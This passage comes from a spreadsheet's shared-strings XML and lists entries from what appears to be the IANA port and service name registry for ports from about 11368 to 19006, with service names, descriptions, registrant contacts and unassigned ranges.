  </si>
  <si>
    <t>[Todd_Barker]</t>
  </si>
  <si>
    <t>11368-11370</t>
  </si>
  <si>
    <t>hkp</t>
  </si>
  <si>
    <t>OpenPGP HTTP Keyserver</t>
  </si>
  <si>
    <t>[David_Shaw]</t>
  </si>
  <si>
    <t>11372-11429</t>
  </si>
  <si>
    <t>lsdp</t>
  </si>
  <si>
    <t>Lenbrook Service Discovery Protocol</t>
  </si>
  <si>
    <t>[Lenbrook_Industries_Limited]</t>
  </si>
  <si>
    <t>[Kevin_Groeneveld]</t>
  </si>
  <si>
    <t>11431-11488</t>
  </si>
  <si>
    <t>Known UNAUTHORIZED USE: port 11488</t>
  </si>
  <si>
    <t>asgcypresstcps</t>
  </si>
  <si>
    <t>ASG Cypress Secure Only</t>
  </si>
  <si>
    <t>[David_Luxford]</t>
  </si>
  <si>
    <t>11490-11599</t>
  </si>
  <si>
    <t>tempest-port</t>
  </si>
  <si>
    <t>Tempest Protocol Port</t>
  </si>
  <si>
    <t>[Francis_Cianfrocca]</t>
  </si>
  <si>
    <t>11601-11622</t>
  </si>
  <si>
    <t>emc-xsw-dconfig</t>
  </si>
  <si>
    <t>EMC XtremSW distributed config</t>
  </si>
  <si>
    <t>[EMC]</t>
  </si>
  <si>
    <t>[David_Erel]</t>
  </si>
  <si>
    <t>11624-11719</t>
  </si>
  <si>
    <t>Unauthorized Use Known on port 11711</t>
  </si>
  <si>
    <t>h323callsigalt</t>
  </si>
  <si>
    <t>H.323 Call Control Signalling Alternate</t>
  </si>
  <si>
    <t>11721-11722</t>
  </si>
  <si>
    <t>emc-xsw-dcache</t>
  </si>
  <si>
    <t>EMC XtremSW distributed cache</t>
  </si>
  <si>
    <t>11724-11750</t>
  </si>
  <si>
    <t>intrepid-ssl</t>
  </si>
  <si>
    <t>Intrepid SSL</t>
  </si>
  <si>
    <t>[Robert_Eden]</t>
  </si>
  <si>
    <t>11752-11795</t>
  </si>
  <si>
    <t>lanschool</t>
  </si>
  <si>
    <t>LanSchool</t>
  </si>
  <si>
    <t>[Stoneware_Inc]</t>
  </si>
  <si>
    <t>[Dana_Doggett]</t>
  </si>
  <si>
    <t>lanschool-mpt</t>
  </si>
  <si>
    <t>Lanschool Multipoint</t>
  </si>
  <si>
    <t>11797-11875</t>
  </si>
  <si>
    <t>xoraya</t>
  </si>
  <si>
    <t>X2E Xoraya Multichannel protocol</t>
  </si>
  <si>
    <t>[Hannes_K]</t>
  </si>
  <si>
    <t>x2e-disc</t>
  </si>
  <si>
    <t>X2E service discovery protocol</t>
  </si>
  <si>
    <t>11878-11966</t>
  </si>
  <si>
    <t>sysinfo-sp</t>
  </si>
  <si>
    <t>SysInfo Service Protocol</t>
  </si>
  <si>
    <t>[Mike_Cooper]</t>
  </si>
  <si>
    <t>11968-11970</t>
  </si>
  <si>
    <t>tibsd</t>
  </si>
  <si>
    <t>TiBS Service</t>
  </si>
  <si>
    <t>[Teradactyl_LLC]</t>
  </si>
  <si>
    <t>[Kristen_Webb]</t>
  </si>
  <si>
    <t>11972-11996</t>
  </si>
  <si>
    <t>wmereceiving</t>
  </si>
  <si>
    <t>WorldMailExpress</t>
  </si>
  <si>
    <t>[Greg_Foutz]</t>
  </si>
  <si>
    <t>wmedistribution</t>
  </si>
  <si>
    <t>wmereporting</t>
  </si>
  <si>
    <t>entextxid</t>
  </si>
  <si>
    <t>IBM Enterprise Extender SNA XID Exchange</t>
  </si>
  <si>
    <t>[Eugene_Cox]</t>
  </si>
  <si>
    <t>entextnetwk</t>
  </si>
  <si>
    <t>IBM Enterprise Extender SNA COS Network Priority</t>
  </si>
  <si>
    <t>entexthigh</t>
  </si>
  <si>
    <t>IBM Enterprise Extender SNA COS High Priority</t>
  </si>
  <si>
    <t>entextmed</t>
  </si>
  <si>
    <t>IBM Enterprise Extender SNA COS Medium Priority</t>
  </si>
  <si>
    <t>entextlow</t>
  </si>
  <si>
    <t>IBM Enterprise Extender SNA COS Low Priority</t>
  </si>
  <si>
    <t>dbisamserver1</t>
  </si>
  <si>
    <t>DBISAM Database Server - Regular</t>
  </si>
  <si>
    <t>[Tim_Young]</t>
  </si>
  <si>
    <t>dbisamserver2</t>
  </si>
  <si>
    <t>DBISAM Database Server - Admin</t>
  </si>
  <si>
    <t>accuracer</t>
  </si>
  <si>
    <t>Accuracer Database System Server</t>
  </si>
  <si>
    <t>[Alexander_V_Ivanov]</t>
  </si>
  <si>
    <t>accuracer-dbms</t>
  </si>
  <si>
    <t>Accuracer Database System Admin</t>
  </si>
  <si>
    <t>ghvpn</t>
  </si>
  <si>
    <t>Green Hills VPN</t>
  </si>
  <si>
    <t>[Green_Hills_Software]</t>
  </si>
  <si>
    <t>[Tom_R_Zavisca]</t>
  </si>
  <si>
    <t>edbsrvr</t>
  </si>
  <si>
    <t>ElevateDB Server</t>
  </si>
  <si>
    <t>vipera</t>
  </si>
  <si>
    <t>Vipera Messaging Service</t>
  </si>
  <si>
    <t>[Silvano_Maffeis_2]</t>
  </si>
  <si>
    <t>vipera-ssl</t>
  </si>
  <si>
    <t>Vipera Messaging Service over SSL Communication</t>
  </si>
  <si>
    <t>12014-12108</t>
  </si>
  <si>
    <t>rets-ssl</t>
  </si>
  <si>
    <t>RETS over SSL</t>
  </si>
  <si>
    <t>12110-12120</t>
  </si>
  <si>
    <t>nupaper-ss</t>
  </si>
  <si>
    <t>NuPaper Session Service</t>
  </si>
  <si>
    <t>[David_Warden_2]</t>
  </si>
  <si>
    <t>12122-12167</t>
  </si>
  <si>
    <t>cawas</t>
  </si>
  <si>
    <t>CA Web Access Service</t>
  </si>
  <si>
    <t>[Jon_Press]</t>
  </si>
  <si>
    <t>12169-12171</t>
  </si>
  <si>
    <t>hivep</t>
  </si>
  <si>
    <t>HiveP</t>
  </si>
  <si>
    <t>[Dick_Augustsson]</t>
  </si>
  <si>
    <t>12173-12299</t>
  </si>
  <si>
    <t>linogridengine</t>
  </si>
  <si>
    <t>LinoGrid Engine</t>
  </si>
  <si>
    <t>[Frans_Lundberg]</t>
  </si>
  <si>
    <t>rads</t>
  </si>
  <si>
    <t>Remote Administration Daemon (RAD) is a system service that offers secure, remote, programmatic access to Solaris system configuration and run-time state</t>
  </si>
  <si>
    <t>[Oracle]</t>
  </si>
  <si>
    <t>[Devjani_Ray]</t>
  </si>
  <si>
    <t>12303-12320</t>
  </si>
  <si>
    <t>warehouse-sss</t>
  </si>
  <si>
    <t>Warehouse Monitoring Syst SSS</t>
  </si>
  <si>
    <t>[Craig_Steffen]</t>
  </si>
  <si>
    <t>warehouse</t>
  </si>
  <si>
    <t>Warehouse Monitoring Syst</t>
  </si>
  <si>
    <t>12323-12344</t>
  </si>
  <si>
    <t>italk</t>
  </si>
  <si>
    <t>Italk Chat System</t>
  </si>
  <si>
    <t>[Takayuki_Ito]</t>
  </si>
  <si>
    <t>12346-12752</t>
  </si>
  <si>
    <t>tsaf</t>
  </si>
  <si>
    <t>tsaf port</t>
  </si>
  <si>
    <t>[Andreas_Fehr]</t>
  </si>
  <si>
    <t>12754-12864</t>
  </si>
  <si>
    <t>netperf</t>
  </si>
  <si>
    <t>control port for the netperf benchmark</t>
  </si>
  <si>
    <t>[netperf.org]</t>
  </si>
  <si>
    <t>[rick_jones]</t>
  </si>
  <si>
    <t>12866-13159</t>
  </si>
  <si>
    <t>i-zipqd</t>
  </si>
  <si>
    <t>I-ZIPQD</t>
  </si>
  <si>
    <t>[Chuck_Runquist]</t>
  </si>
  <si>
    <t>13161-13215</t>
  </si>
  <si>
    <t>bcslogc</t>
  </si>
  <si>
    <t>Black Crow Software application logging</t>
  </si>
  <si>
    <t>[Ramindur_Singh]</t>
  </si>
  <si>
    <t>rs-pias</t>
  </si>
  <si>
    <t>R&amp;S Proxy Installation Assistant Service</t>
  </si>
  <si>
    <t>[Guido_Kiener]</t>
  </si>
  <si>
    <t>emc-vcas-tcp</t>
  </si>
  <si>
    <t>EMC Virtual CAS Service</t>
  </si>
  <si>
    <t>emc-vcas-udp</t>
  </si>
  <si>
    <t>EMV Virtual CAS Service Discovery</t>
  </si>
  <si>
    <t>[Mark_O_Connell]</t>
  </si>
  <si>
    <t>13219-13222</t>
  </si>
  <si>
    <t>powwow-client</t>
  </si>
  <si>
    <t>PowWow Client</t>
  </si>
  <si>
    <t>[Paul_K_Peterson]</t>
  </si>
  <si>
    <t>powwow-server</t>
  </si>
  <si>
    <t>PowWow Server</t>
  </si>
  <si>
    <t>13225-13399</t>
  </si>
  <si>
    <t>doip-data</t>
  </si>
  <si>
    <t>DoIP Data</t>
  </si>
  <si>
    <t>[Joerg_Schneider]</t>
  </si>
  <si>
    <t>doip-disc</t>
  </si>
  <si>
    <t>DoIP Discovery</t>
  </si>
  <si>
    <t>13401-13719</t>
  </si>
  <si>
    <t>bprd</t>
  </si>
  <si>
    <t>BPRD Protocol (VERITAS NetBackup)</t>
  </si>
  <si>
    <t>[Jeff_Holmbeck]</t>
  </si>
  <si>
    <t>bpdbm</t>
  </si>
  <si>
    <t>BPDBM Protocol (VERITAS NetBackup)</t>
  </si>
  <si>
    <t>bpjava-msvc</t>
  </si>
  <si>
    <t>BP Java MSVC Protocol</t>
  </si>
  <si>
    <t>[Tim_Schmidt]</t>
  </si>
  <si>
    <t>vnetd</t>
  </si>
  <si>
    <t>Veritas Network Utility</t>
  </si>
  <si>
    <t>13725-13781</t>
  </si>
  <si>
    <t>bpcd</t>
  </si>
  <si>
    <t>VERITAS NetBackup</t>
  </si>
  <si>
    <t>vopied</t>
  </si>
  <si>
    <t>VOPIED Protocol</t>
  </si>
  <si>
    <t>nbdb</t>
  </si>
  <si>
    <t>NetBackup Database</t>
  </si>
  <si>
    <t>[Pat_Tovo]</t>
  </si>
  <si>
    <t>nomdb</t>
  </si>
  <si>
    <t>Veritas-nomdb</t>
  </si>
  <si>
    <t>[Clayton_Haapala]</t>
  </si>
  <si>
    <t>13787-13817</t>
  </si>
  <si>
    <t>dsmcc-config</t>
  </si>
  <si>
    <t>DSMCC Config</t>
  </si>
  <si>
    <t>[Tim_Addington]</t>
  </si>
  <si>
    <t>[ISO/IEC 13818-6 MPEG-2 DSM-CC]</t>
  </si>
  <si>
    <t>dsmcc-session</t>
  </si>
  <si>
    <t>DSMCC Session Messages</t>
  </si>
  <si>
    <t>dsmcc-passthru</t>
  </si>
  <si>
    <t>DSMCC Pass-Thru Messages</t>
  </si>
  <si>
    <t>dsmcc-download</t>
  </si>
  <si>
    <t>DSMCC Download Protocol</t>
  </si>
  <si>
    <t>dsmcc-ccp</t>
  </si>
  <si>
    <t>DSMCC Channel Change Protocol</t>
  </si>
  <si>
    <t>bmdss</t>
  </si>
  <si>
    <t>Blackmagic Design Streaming Server</t>
  </si>
  <si>
    <t>[Sam_Vaughan]</t>
  </si>
  <si>
    <t>13824-13893</t>
  </si>
  <si>
    <t>ucontrol</t>
  </si>
  <si>
    <t>Ultimate Control communication protocol</t>
  </si>
  <si>
    <t>[NEGU_Soft]</t>
  </si>
  <si>
    <t>[borja_lopez_urkidi]</t>
  </si>
  <si>
    <t>13895-13928</t>
  </si>
  <si>
    <t>dta-systems</t>
  </si>
  <si>
    <t>D-TA SYSTEMS</t>
  </si>
  <si>
    <t>[Alexis_Bose]</t>
  </si>
  <si>
    <t>medevolve</t>
  </si>
  <si>
    <t>MedEvolve Port Requester</t>
  </si>
  <si>
    <t>[Jon_Robertson]</t>
  </si>
  <si>
    <t>13931-13999</t>
  </si>
  <si>
    <t>scotty-ft</t>
  </si>
  <si>
    <t>SCOTTY High-Speed Filetransfer</t>
  </si>
  <si>
    <t>[Patrick_Verbeek]</t>
  </si>
  <si>
    <t>sua</t>
  </si>
  <si>
    <t>SUA</t>
  </si>
  <si>
    <t>[Miguel_Angel_Garcia]</t>
  </si>
  <si>
    <t>De-Registered</t>
  </si>
  <si>
    <t>scotty-disc</t>
  </si>
  <si>
    <t>Discovery of a SCOTTY hardware codec board</t>
  </si>
  <si>
    <t>[SCOTTY_Group_SE]</t>
  </si>
  <si>
    <t>[Patrick_Verbeek_2]</t>
  </si>
  <si>
    <t>14003-14032</t>
  </si>
  <si>
    <t>sage-best-com1</t>
  </si>
  <si>
    <t>sage Best! Config Server 1</t>
  </si>
  <si>
    <t>[Christian_Rubach]</t>
  </si>
  <si>
    <t>sage-best-com2</t>
  </si>
  <si>
    <t>sage Best! Config Server 2</t>
  </si>
  <si>
    <t>14035-14140</t>
  </si>
  <si>
    <t>vcs-app</t>
  </si>
  <si>
    <t>VCS Application</t>
  </si>
  <si>
    <t>icpp</t>
  </si>
  <si>
    <t>IceWall Cert Protocol</t>
  </si>
  <si>
    <t>[Tsutomu_Fujinami]</t>
  </si>
  <si>
    <t>icpps</t>
  </si>
  <si>
    <t>IceWall Cert Protocol over TLS</t>
  </si>
  <si>
    <t>[Kenta_Kambara]</t>
  </si>
  <si>
    <t>gcm-app</t>
  </si>
  <si>
    <t>GCM Application</t>
  </si>
  <si>
    <t>14146-14148</t>
  </si>
  <si>
    <t>vrts-tdd</t>
  </si>
  <si>
    <t>Veritas Traffic Director</t>
  </si>
  <si>
    <t>[Sameer_Deokule]</t>
  </si>
  <si>
    <t>vcscmd</t>
  </si>
  <si>
    <t>Veritas Cluster Server Command Server</t>
  </si>
  <si>
    <t>[Anand_Bhalerao]</t>
  </si>
  <si>
    <t>14151-14153</t>
  </si>
  <si>
    <t>vad</t>
  </si>
  <si>
    <t>Veritas Application Director</t>
  </si>
  <si>
    <t>[Rajeev_Verma]</t>
  </si>
  <si>
    <t>14155-14249</t>
  </si>
  <si>
    <t>cps</t>
  </si>
  <si>
    <t>Fencing Server</t>
  </si>
  <si>
    <t>[Mayank_Vasa]</t>
  </si>
  <si>
    <t>14251-14413</t>
  </si>
  <si>
    <t>ca-web-update</t>
  </si>
  <si>
    <t>CA eTrust Web Update Service</t>
  </si>
  <si>
    <t>[Robert_Ciochon]</t>
  </si>
  <si>
    <t>14415-14499</t>
  </si>
  <si>
    <t>xpra</t>
  </si>
  <si>
    <t>xpra network protocol</t>
  </si>
  <si>
    <t>[Xpra]</t>
  </si>
  <si>
    <t>[Antoine_Martin]</t>
  </si>
  <si>
    <t>14501-14935</t>
  </si>
  <si>
    <t>hde-lcesrvr-1</t>
  </si>
  <si>
    <t>[Horizon_Digital_Ente]</t>
  </si>
  <si>
    <t>hde-lcesrvr-2</t>
  </si>
  <si>
    <t>14938-14999</t>
  </si>
  <si>
    <t>hydap</t>
  </si>
  <si>
    <t>Hypack Data Aquisition</t>
  </si>
  <si>
    <t>[HYPACK_Inc]</t>
  </si>
  <si>
    <t>[Mircea_Neacsu]</t>
  </si>
  <si>
    <t>onep-tls</t>
  </si>
  <si>
    <t>Open Network Environment TLS</t>
  </si>
  <si>
    <t>[Cisco_3]</t>
  </si>
  <si>
    <t>[Andrew_Thurber]</t>
  </si>
  <si>
    <t>15003-15117</t>
  </si>
  <si>
    <t>v2g-secc</t>
  </si>
  <si>
    <t>v2g Supply Equipment Communication Controller Discovery Protocol</t>
  </si>
  <si>
    <t>[Holger_Lochner]</t>
  </si>
  <si>
    <t>15119-15344</t>
  </si>
  <si>
    <t>xpilot</t>
  </si>
  <si>
    <t>XPilot Contact Port</t>
  </si>
  <si>
    <t>[Bert_Gijsbers]</t>
  </si>
  <si>
    <t>15346-15362</t>
  </si>
  <si>
    <t>3link</t>
  </si>
  <si>
    <t>3Link Negotiation</t>
  </si>
  <si>
    <t>[Brant_Thomsen]</t>
  </si>
  <si>
    <t>15364-15554</t>
  </si>
  <si>
    <t>cisco-snat</t>
  </si>
  <si>
    <t>Cisco Stateful NAT</t>
  </si>
  <si>
    <t>[Kaushik_Biswas]</t>
  </si>
  <si>
    <t>15556-15659</t>
  </si>
  <si>
    <t>bex-xr</t>
  </si>
  <si>
    <t>Backup Express Restore Server</t>
  </si>
  <si>
    <t>15661-15739</t>
  </si>
  <si>
    <t>ptp</t>
  </si>
  <si>
    <t>Picture Transfer Protocol</t>
  </si>
  <si>
    <t>[Petronel_Bigioi]</t>
  </si>
  <si>
    <t>Defined TXT keys: guid=&lt;Device guid&gt;</t>
  </si>
  <si>
    <t>15741-15997</t>
  </si>
  <si>
    <t>2ping</t>
  </si>
  <si>
    <t>2ping Bi-Directional Ping Service</t>
  </si>
  <si>
    <t>[Ryan_Finnie]</t>
  </si>
  <si>
    <t>programmar</t>
  </si>
  <si>
    <t>ProGrammar Enterprise</t>
  </si>
  <si>
    <t>[Norman_Wilson]</t>
  </si>
  <si>
    <t>fmsas</t>
  </si>
  <si>
    <t>Administration Server Access</t>
  </si>
  <si>
    <t>[Mark_Davidson]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 16000</t>
  </si>
  <si>
    <t>fmsascon</t>
  </si>
  <si>
    <t>Administration Server Connector</t>
  </si>
  <si>
    <t>gsms</t>
  </si>
  <si>
    <t>GoodSync Mediation Service</t>
  </si>
  <si>
    <t>[Vadim_Maslov]</t>
  </si>
  <si>
    <t>alfin</t>
  </si>
  <si>
    <t>Automation and Control by REGULACE.ORG</t>
  </si>
  <si>
    <t>[Ing_Tomas_Halabala]</t>
  </si>
  <si>
    <t>16004-16019</t>
  </si>
  <si>
    <t>jwpc</t>
  </si>
  <si>
    <t>Filemaker Java Web Publishing Core</t>
  </si>
  <si>
    <t>[Robert_Parks]</t>
  </si>
  <si>
    <t>jwpc-bin</t>
  </si>
  <si>
    <t>Filemaker Java Web Publishing Core Binary</t>
  </si>
  <si>
    <t>16022-16160</t>
  </si>
  <si>
    <t>sun-sea-port</t>
  </si>
  <si>
    <t>Solaris SEA Port</t>
  </si>
  <si>
    <t>[Dana_Porter]</t>
  </si>
  <si>
    <t>solaris-audit</t>
  </si>
  <si>
    <t>Solaris Audit - secure remote audit log</t>
  </si>
  <si>
    <t>[Jan_Friedel]</t>
  </si>
  <si>
    <t>16163-16308</t>
  </si>
  <si>
    <t>etb4j</t>
  </si>
  <si>
    <t>[Christopher_R_Smith]</t>
  </si>
  <si>
    <t>pduncs</t>
  </si>
  <si>
    <t>Policy Distribute, Update Notification</t>
  </si>
  <si>
    <t>[Diane_I_Shannon]</t>
  </si>
  <si>
    <t>pdefmns</t>
  </si>
  <si>
    <t>Policy definition and update management</t>
  </si>
  <si>
    <t>16312-16359</t>
  </si>
  <si>
    <t>netserialext1</t>
  </si>
  <si>
    <t>Network Serial Extension Ports One</t>
  </si>
  <si>
    <t>[Michael_J_Hoy]</t>
  </si>
  <si>
    <t>netserialext2</t>
  </si>
  <si>
    <t>Network Serial Extension Ports Two</t>
  </si>
  <si>
    <t>16362-16366</t>
  </si>
  <si>
    <t>netserialext3</t>
  </si>
  <si>
    <t>Network Serial Extension Ports Three</t>
  </si>
  <si>
    <t>netserialext4</t>
  </si>
  <si>
    <t>Network Serial Extension Ports Four</t>
  </si>
  <si>
    <t>16369-16383</t>
  </si>
  <si>
    <t>connected</t>
  </si>
  <si>
    <t>Connected Corp</t>
  </si>
  <si>
    <t>[Nicole_C_Ouellette]</t>
  </si>
  <si>
    <t>rdgs</t>
  </si>
  <si>
    <t>Reliable Datagram Sockets</t>
  </si>
  <si>
    <t>[Oracle_7]</t>
  </si>
  <si>
    <t>[Sowmini_Varadhan]</t>
  </si>
  <si>
    <t>16386-16618</t>
  </si>
  <si>
    <t>xoms</t>
  </si>
  <si>
    <t>X509 Objects Management Service</t>
  </si>
  <si>
    <t>[Francis_GASCHET]</t>
  </si>
  <si>
    <t>16620-16664</t>
  </si>
  <si>
    <t>axon-tunnel</t>
  </si>
  <si>
    <t>Reliable multipath data transport for high latencies</t>
  </si>
  <si>
    <t>[Bridgeworks]</t>
  </si>
  <si>
    <t>[Paul_Burgess]</t>
  </si>
  <si>
    <t>vtp</t>
  </si>
  <si>
    <t>Vidder Tunnel Protocol</t>
  </si>
  <si>
    <t>[Vidder_Inc]</t>
  </si>
  <si>
    <t>[Ted_Schroeder_2]</t>
  </si>
  <si>
    <t>16667-16788</t>
  </si>
  <si>
    <t>cadsisvr</t>
  </si>
  <si>
    <t>This server provides callable services to mainframe External Security Managers from any TCP/IP platform</t>
  </si>
  <si>
    <t>[CA_Technologies]</t>
  </si>
  <si>
    <t>[Thomas_Sakowski]</t>
  </si>
  <si>
    <t>16790-16899</t>
  </si>
  <si>
    <t>newbay-snc-mc</t>
  </si>
  <si>
    <t>Newbay Mobile Client Update Service</t>
  </si>
  <si>
    <t>[Srinivasa_Nayudu]</t>
  </si>
  <si>
    <t>16901-16949</t>
  </si>
  <si>
    <t>sgcip</t>
  </si>
  <si>
    <t>Simple Generic Client Interface Protocol</t>
  </si>
  <si>
    <t>[John_Aquilino]</t>
  </si>
  <si>
    <t>16951-16990</t>
  </si>
  <si>
    <t>intel-rci-mp</t>
  </si>
  <si>
    <t>INTEL-RCI-MP</t>
  </si>
  <si>
    <t>[Jane_Dashevsky]</t>
  </si>
  <si>
    <t>amt-soap-http</t>
  </si>
  <si>
    <t>Intel(R) AMT SOAP/HTTP</t>
  </si>
  <si>
    <t>[David_T_Hines]</t>
  </si>
  <si>
    <t>amt-soap-https</t>
  </si>
  <si>
    <t>Intel(R) AMT SOAP/HTTPS</t>
  </si>
  <si>
    <t>amt-redir-tcp</t>
  </si>
  <si>
    <t>Intel(R) AMT Redirection/TCP</t>
  </si>
  <si>
    <t>[Nimrod_Diamant]</t>
  </si>
  <si>
    <t>amt-redir-tls</t>
  </si>
  <si>
    <t>Intel(R) AMT Redirection/TLS</t>
  </si>
  <si>
    <t>16996-17006</t>
  </si>
  <si>
    <t>isode-dua</t>
  </si>
  <si>
    <t>17008-17183</t>
  </si>
  <si>
    <t>vestasdlp</t>
  </si>
  <si>
    <t>Vestas Data Layer Protocol</t>
  </si>
  <si>
    <t>[Vestas_Wind_Systems]</t>
  </si>
  <si>
    <t>[Teunis_de_Wit]</t>
  </si>
  <si>
    <t>soundsvirtual</t>
  </si>
  <si>
    <t>Sounds Virtual</t>
  </si>
  <si>
    <t>[Richard_Snider]</t>
  </si>
  <si>
    <t>17186-17218</t>
  </si>
  <si>
    <t>chipper</t>
  </si>
  <si>
    <t>Chipper</t>
  </si>
  <si>
    <t>[Ronald_Jimmink]</t>
  </si>
  <si>
    <t>avtp</t>
  </si>
  <si>
    <t>IEEE 1722 Transport Protocol for Time Sensitive Applications</t>
  </si>
  <si>
    <t>[Transport_Protocol_for_Time-Sensitive_Networking_TG]</t>
  </si>
  <si>
    <t>[Ashley_Butterworth]</t>
  </si>
  <si>
    <t>avdecc</t>
  </si>
  <si>
    <t>IEEE 1722.1 AVB Discovery, Enumeration, Connection management, and Control</t>
  </si>
  <si>
    <t>[IEEE_1722_1]</t>
  </si>
  <si>
    <t>[Jeffrey_Daniel_Koftinoff]</t>
  </si>
  <si>
    <t>cpsp</t>
  </si>
  <si>
    <t>Control Plane Synchronization Protocol (SPSP)</t>
  </si>
  <si>
    <t>[Randall_Stewart_2]</t>
  </si>
  <si>
    <t>isa100-gci</t>
  </si>
  <si>
    <t>ISA100 GCI is a service utilizing a common interface between an ISA100 Wireless gateway and a client application</t>
  </si>
  <si>
    <t>[ISA100_Wireless_Compliance_Institute]</t>
  </si>
  <si>
    <t>[Jay_Werb]</t>
  </si>
  <si>
    <t>trdp-pd</t>
  </si>
  <si>
    <t>Train Realtime Data Protocol (TRDP) Process Data</t>
  </si>
  <si>
    <t>[IEC_Central_Office]</t>
  </si>
  <si>
    <t>[Gianosvaldo_Fadin]</t>
  </si>
  <si>
    <t>trdp-md</t>
  </si>
  <si>
    <t>Train Realtime Data Protocol (TRDP) Message Data</t>
  </si>
  <si>
    <t>17226-17233</t>
  </si>
  <si>
    <t>integrius-stp</t>
  </si>
  <si>
    <t>Integrius Secure Tunnel Protocol</t>
  </si>
  <si>
    <t>[Christian_Klemetsson]</t>
  </si>
  <si>
    <t>ssh-mgmt</t>
  </si>
  <si>
    <t>SSH Tectia Manager</t>
  </si>
  <si>
    <t>[Ville_Laurikari]</t>
  </si>
  <si>
    <t>17236-17499</t>
  </si>
  <si>
    <t>db-lsp</t>
  </si>
  <si>
    <t>Dropbox LanSync Protocol</t>
  </si>
  <si>
    <t>[Paul_Bohm]</t>
  </si>
  <si>
    <t>db-lsp-disc</t>
  </si>
  <si>
    <t>Dropbox LanSync Discovery</t>
  </si>
  <si>
    <t>17501-17554</t>
  </si>
  <si>
    <t>ailith</t>
  </si>
  <si>
    <t>Ailith management of routers</t>
  </si>
  <si>
    <t>[Thomas_Boje]</t>
  </si>
  <si>
    <t>17556-17728</t>
  </si>
  <si>
    <t>ea</t>
  </si>
  <si>
    <t>Eclipse Aviation</t>
  </si>
  <si>
    <t>[William_Schmidt]</t>
  </si>
  <si>
    <t>17730-17753</t>
  </si>
  <si>
    <t>zep</t>
  </si>
  <si>
    <t>Encap. ZigBee Packets</t>
  </si>
  <si>
    <t>[Fred_Fierling]</t>
  </si>
  <si>
    <t>zigbee-ip</t>
  </si>
  <si>
    <t>ZigBee IP Transport Service</t>
  </si>
  <si>
    <t>[Chris_Herzog]</t>
  </si>
  <si>
    <t>zigbee-ips</t>
  </si>
  <si>
    <t>ZigBee IP Transport Secure Service</t>
  </si>
  <si>
    <t>17757-17776</t>
  </si>
  <si>
    <t>sw-orion</t>
  </si>
  <si>
    <t>SolarWinds Orion</t>
  </si>
  <si>
    <t>[Joel_Dolisy]</t>
  </si>
  <si>
    <t>17778-17999</t>
  </si>
  <si>
    <t>biimenu</t>
  </si>
  <si>
    <t>Beckman Instruments, Inc.</t>
  </si>
  <si>
    <t>[R_L_Meyering]</t>
  </si>
  <si>
    <t>18001-18103</t>
  </si>
  <si>
    <t>radpdf</t>
  </si>
  <si>
    <t>RAD PDF Service</t>
  </si>
  <si>
    <t>[Christopher_Truxaw]</t>
  </si>
  <si>
    <t>18105-18135</t>
  </si>
  <si>
    <t>racf</t>
  </si>
  <si>
    <t>z/OS Resource Access Control Facility</t>
  </si>
  <si>
    <t>[Bruce_Wells]</t>
  </si>
  <si>
    <t>18137-18180</t>
  </si>
  <si>
    <t>opsec-cvp</t>
  </si>
  <si>
    <t>OPSEC CVP</t>
  </si>
  <si>
    <t>[Alon_Kantor]</t>
  </si>
  <si>
    <t>opsec-ufp</t>
  </si>
  <si>
    <t>OPSEC UFP</t>
  </si>
  <si>
    <t>opsec-sam</t>
  </si>
  <si>
    <t>OPSEC SAM</t>
  </si>
  <si>
    <t>opsec-lea</t>
  </si>
  <si>
    <t>OPSEC LEA</t>
  </si>
  <si>
    <t>opsec-omi</t>
  </si>
  <si>
    <t>OPSEC OMI</t>
  </si>
  <si>
    <t>ohsc</t>
  </si>
  <si>
    <t>Occupational Health SC</t>
  </si>
  <si>
    <t>[David_Fudge]</t>
  </si>
  <si>
    <t>Occupational Health Sc</t>
  </si>
  <si>
    <t>opsec-ela</t>
  </si>
  <si>
    <t>OPSEC ELA</t>
  </si>
  <si>
    <t>18188-18240</t>
  </si>
  <si>
    <t>checkpoint-rtm</t>
  </si>
  <si>
    <t>Check Point RTM</t>
  </si>
  <si>
    <t>[Dudi_Hazan]</t>
  </si>
  <si>
    <t>iclid</t>
  </si>
  <si>
    <t>Checkpoint router monitoring</t>
  </si>
  <si>
    <t>[Check_Point_Software]</t>
  </si>
  <si>
    <t>[Rahul_Bahadur]</t>
  </si>
  <si>
    <t>clusterxl</t>
  </si>
  <si>
    <t>Checkpoint router state backup</t>
  </si>
  <si>
    <t>18244-18261</t>
  </si>
  <si>
    <t>gv-pf</t>
  </si>
  <si>
    <t>GV NetConfig Service</t>
  </si>
  <si>
    <t>[Scott_Libert]</t>
  </si>
  <si>
    <t>18263-18462</t>
  </si>
  <si>
    <t>ac-cluster</t>
  </si>
  <si>
    <t>AC Cluster</t>
  </si>
  <si>
    <t>[Lisa_Zhong]</t>
  </si>
  <si>
    <t>18464-18515</t>
  </si>
  <si>
    <t>heythings</t>
  </si>
  <si>
    <t>HeyThings Device communicate service</t>
  </si>
  <si>
    <t>[Guangdong_OPPO_Mobile_Telecommunications_Corp_Ltd]</t>
  </si>
  <si>
    <t>[Zhai_Zhaoxuan]</t>
  </si>
  <si>
    <t>Defined TXT keys: heythings</t>
  </si>
  <si>
    <t>18517-18633</t>
  </si>
  <si>
    <t>rds-ib</t>
  </si>
  <si>
    <t>Reliable Datagram Service</t>
  </si>
  <si>
    <t>[Andy_Grover]</t>
  </si>
  <si>
    <t>rds-ip</t>
  </si>
  <si>
    <t>Reliable Datagram Service over IP</t>
  </si>
  <si>
    <t>18636-18667</t>
  </si>
  <si>
    <t>vdmmesh</t>
  </si>
  <si>
    <t>Manufacturing Execution Systems Mesh Communication</t>
  </si>
  <si>
    <t>[Van_Doren_MES]</t>
  </si>
  <si>
    <t>[Edwin_van_de_Burgt]</t>
  </si>
  <si>
    <t>vdmmesh-disc</t>
  </si>
  <si>
    <t>18669-18768</t>
  </si>
  <si>
    <t>ique</t>
  </si>
  <si>
    <t>IQue Protocol</t>
  </si>
  <si>
    <t>[Avi_Drissman]</t>
  </si>
  <si>
    <t>18770-18880</t>
  </si>
  <si>
    <t>infotos</t>
  </si>
  <si>
    <t>Infotos</t>
  </si>
  <si>
    <t>[Marcel_Dube]</t>
  </si>
  <si>
    <t>18882-18887</t>
  </si>
  <si>
    <t>apc-necmp</t>
  </si>
  <si>
    <t>APCNECMP</t>
  </si>
  <si>
    <t>[Michael_Yip]</t>
  </si>
  <si>
    <t>18889-18999</t>
  </si>
  <si>
    <t>igrid</t>
  </si>
  <si>
    <t>iGrid Server</t>
  </si>
  <si>
    <t>[Massimo_Cafaro]</t>
  </si>
  <si>
    <t>19001-19006</t>
  </si>
  <si>
    <t>scintilla</t>
  </si>
  <si>
    <t>Scintilla protocol for device services</t>
  </si>
  <si>
